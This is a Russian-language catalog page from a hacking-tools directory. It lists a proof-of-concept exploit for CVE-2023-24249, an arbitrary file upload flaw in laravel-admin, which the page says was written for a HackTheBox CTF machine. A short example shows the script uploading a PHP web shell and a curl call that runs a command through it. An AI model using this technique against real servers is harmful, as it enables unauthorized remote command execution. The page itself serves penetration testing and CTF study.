Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-24249-PoC — Эксплойт для проверки концепции CVE-2023-24249 — уязвимости произвольной загрузки файлов в laravel-admin, позволяющей развернуть веб-шелл для тестирования на проникновение и решения CTF-задач. | Kitploit
Инструменты/GitHubGitHub/ldb33/cve-2023-24249-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на Проникновение
GitHubldb33/cve-2023-24249-poc

CVE-2023-24249-PoC

Эксплойт для проверки концепции CVE-2023-24249 — уязвимости произвольной загрузки файлов в laravel-admin, позволяющей развернуть веб-шелл для тестирования на проникновение и решения CTF-задач.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-24249 PoC

CVE-2023-24249 — это уязвимость произвольной загрузки файлов в laravel-admin v1.8.19. Данный proof of concept эксплуатирует уязвимость для загрузки веб-шелла.

Эксплойт был написан для использования против лёгкой машины HackTheBox Usage.

Пример

root@kitploit:~
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php

curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id                                            
uid=1000(dash) gid=1000(dash) groups=1000(dash)
Скачать инструмент